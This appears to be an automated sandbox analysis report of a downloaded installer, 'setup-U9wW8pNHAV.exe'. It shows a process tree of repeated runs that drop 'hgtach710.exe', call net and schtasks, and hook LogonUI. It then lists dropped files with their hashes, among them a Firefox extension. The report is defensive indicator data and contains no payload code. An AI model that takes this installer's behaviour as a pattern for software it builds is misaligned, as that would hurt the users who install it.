                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Downloads\setup-U9wW8pNHAV\setup-U9wW8pNHAV.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\setup-U9wW8pNHAV\setup-U9wW8pNHAV.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-039DI.tmp\setup-U9wW8pNHAV.exe.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-039DI.tmp\setup-U9wW8pNHAV.exe.tmp" /SL5="$B0408,3550192,53248,C:\Users\Admin\Downloads\setup-U9wW8pNHAV\setup-U9wW8pNHAV.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\net.exe" helpmsg 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6596
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\net1 helpmsg 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\schtasks.exe" /Delete /F /TN "hgtach710 Service"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe" 81cd2962a3d0f2dd3455186f77b391ce
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2776
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Downloads\setup-U9wW8pNHAV\setup-U9wW8pNHAV.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Downloads\setup-U9wW8pNHAV\setup-U9wW8pNHAV.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-CFEDQ.tmp\setup-U9wW8pNHAV.exe.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-CFEDQ.tmp\setup-U9wW8pNHAV.exe.tmp" /SL5="$40330,3550192,53248,C:\Users\Admin\Downloads\setup-U9wW8pNHAV\setup-U9wW8pNHAV.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\net.exe" helpmsg 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\net1 helpmsg 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe" 81cd2962a3d0f2dd3455186f77b391ce
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\schtasks.exe" /Delete /F /TN "hgtach710 Service"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4384
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Downloads\setup-U9wW8pNHAV\setup-U9wW8pNHAV.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Downloads\setup-U9wW8pNHAV\setup-U9wW8pNHAV.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-RENSF.tmp\setup-U9wW8pNHAV.exe.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-RENSF.tmp\setup-U9wW8pNHAV.exe.tmp" /SL5="$1303C6,3550192,53248,C:\Users\Admin\Downloads\setup-U9wW8pNHAV\setup-U9wW8pNHAV.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5292
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\net.exe" helpmsg 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5308
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\net1 helpmsg 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe" 81cd2962a3d0f2dd3455186f77b391ce
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\schtasks.exe" /Delete /F /TN "hgtach710 Service"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "LogonUI.exe" /flags:0x4 /state0:0xa3ff8055 /state1:0x41c64e6d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7712

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\FQngBackup\SyncBackupShell.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1.4MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4036ba9ca0abfb5eeaaf5979576ac1da

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            8828842fd67ce8f24fee8ef6406f2205e0856cc5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            53b81af4593c03f98427955dc0eadcf032c5f148ebadcd4ce524c4684b8d88ed

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            0ce4119699aea3852769ab2afac13b532b531cd3a56f32af2e7de45ad434f6cc157117403e06eaa6ce71e5b62575832dfcebdf29644856e97182998f4fa4e1d6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\FQngBackup\SyncBackupShell.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1.4MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4036ba9ca0abfb5eeaaf5979576ac1da

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            8828842fd67ce8f24fee8ef6406f2205e0856cc5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            53b81af4593c03f98427955dc0eadcf032c5f148ebadcd4ce524c4684b8d88ed

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            0ce4119699aea3852769ab2afac13b532b531cd3a56f32af2e7de45ad434f6cc157117403e06eaa6ce71e5b62575832dfcebdf29644856e97182998f4fa4e1d6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            760814633af89be4322f9423fb7bf31a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3396aac98e7c145b505efb68334fa15dfb7bffb6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            843e6bf3498235079a439f6a536fcf0c425755d45f4883b88de0ec5856d5e59a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            488e89fd0bce869b1abb99aaf90d95071bc8d8688c1350fdc4711196fcc90925bc96c9992b24ae88f655f25f60a179c99872cd5db7d7066db9467ee68afba591

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            760814633af89be4322f9423fb7bf31a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3396aac98e7c145b505efb68334fa15dfb7bffb6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            843e6bf3498235079a439f6a536fcf0c425755d45f4883b88de0ec5856d5e59a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            488e89fd0bce869b1abb99aaf90d95071bc8d8688c1350fdc4711196fcc90925bc96c9992b24ae88f655f25f60a179c99872cd5db7d7066db9467ee68afba591

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\HGTach Software\HGTach\hgtach710.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            760814633af89be4322f9423fb7bf31a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3396aac98e7c145b505efb68334fa15dfb7bffb6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            843e6bf3498235079a439f6a536fcf0c425755d45f4883b88de0ec5856d5e59a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            488e89fd0bce869b1abb99aaf90d95071bc8d8688c1350fdc4711196fcc90925bc96c9992b24ae88f655f25f60a179c99872cd5db7d7066db9467ee68afba591

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\HGTach Software\HGTach\is-9P1RK.tmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            12KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            c16500579d48c43f53fd7635ea5310ee

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            db1a71e2dc89b5b0881712acf7314814d6586aef

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1e04da1e1c810888070918051709e2ea904cf7b71ecb02834b52fc281cdbc272

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            c4b80bb5d68bcc39fedc4c775d83f6f15994149fdfe2788a6803447401a82b915ec811ac1fcb22f3951725994a0d59193cf6621c04edba2e39e3b216644a35d5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\HGTach Software\HGTach\is-C9633.tmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            51afceff52ac0e2f209a181ab1cedd3b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            624e51a4248065f0c4d78f1303c40e68ffa73943

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1d0297cd98f3eeac0a9a4545cb2cc8eef4a9ff750838843f558019a07f59050a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            aad5a8eecae0c309b9e907c77968471a4cc22278ea5eebb7c30a80e97a192e54d762d55f4a63492f061bc9b30bc1da4f01a28e5e63657315649c4ac6b21a9399

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\HGTach Software\HGTach\is-D2IKN.tmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            12KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            318d07de98dd1c39fe295aa98279205f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            33ef44d971d7f7201818ba36b9b1f68ff3a6006b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            db7110c0599bcbd6f57ef9af909b2771ee1a6a46ea0810b9e1eba4a68ff251a2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2ef6f59573a4de21ce139039f7844af753cfab15b34652bfcc45d3bc52c1a48a84336fcaef7376fd82309fa27354309604e30cedf91f4aa3066caba092947796

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\HGTach Software\HGTach\is-SP2T6.tmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            676KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            8e7ba43573d39d9beff01b83b6d6b7f0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            32d2c651687bed8708bfdcb68dfdecf1860a13e9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            658e77de6874b95974948b792638208fd957178f1657dc049cbeadd977550b7b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            49fcadef9af018ef1b18be2bfe20fd22b98dd37955867835772b66415449e5cdfb94976fc840c84e282f27531fbe6b556ab6f9a175e0897585cd6f9c3114b5e4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\HGTach Software\HGTach\is-U1EA1.tmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            c5b28fc41ba4b279255ade48a9598c0a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3537d4f00680c1702043ae16b98dc0b771ecf8d8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            6de7d87ab3adb728a97d3c809ddfbf4a6541f590bec6e5a189653d533a4d7a2d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ae933c63aa5300b68b9d9f565e58f0cecf22236ddcb55d7d361ac5cbc4f25dfe93637f60b24fc172c8f23efb14ec4c264dda104ccd13b085376fad1ee8fdb191

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            378KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            30003b7b9f5455a0aeb706a94bdc60ea

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5d790655a0b484e68339ab2a3933f5ae8ed05d98

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            c8a8edf31e693d30b5e9712512c7387514f45843bc5eb842f783e59aede061b5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            7db2573ddd2d38dd5cc15fab5258e9d450c8f2435c754c72dca7d82235a95bc01945f97e4d0ff9bd73ed812d4c2d5fd7f9e2ad2e9d8660b5151c76c745617d3a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            893B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            d4ae187b4574036c2d76b6df8a8c1a30

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            b06f409fa14bab33cbaf4a37811b8740b624d9e5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            a2ce3a0fa7d2a833d1801e01ec48e35b70d84f3467cc9f8fab370386e13879c7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1f44a360e8bb8ada22bc5bfe001f1babb4e72005a46bc2a94c33c4bd149ff256cce6f35d65ca4f7fc2a5b9e15494155449830d2809c8cf218d0b9196ec646b0c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            252B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            44d267e0c08ad05bfad2f19c65f46d49

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2a381d8c8ed810b3c0b70ee48a35eeeaa066a425

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            49955bce75c7c2f19a54f2c6c0a381d855a816cbc66fbd7284d1799f492fda5e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            d88c466deb081f54bce30a418e741e23253b0819997cb29ba4a092b3fa07637ed850e69149ccd9f02d85777cc69110a8f741ec59682b18985c7a2113f444e8ba

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\7b3ea522-2bb6-4250-8adf-0eaa86def8dc.tmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            172KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3fe61a2db725deefe78ece23414e7187

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            40bc400ba06904daaeb0e74f7b4d765d40757e74

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            0b2c52353750931626b7167329aa5eb8116047cb4787fb28b61624dd2a411fc9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            d3c1c88f11b9b0456fdfb2e2564565bb1fe32c9f1c944fc215274373ad822146cc3b6aeeae3cf8a84693349cbc8bb88016d578a9f332b84f7c1626ce36af3aef

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            40B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

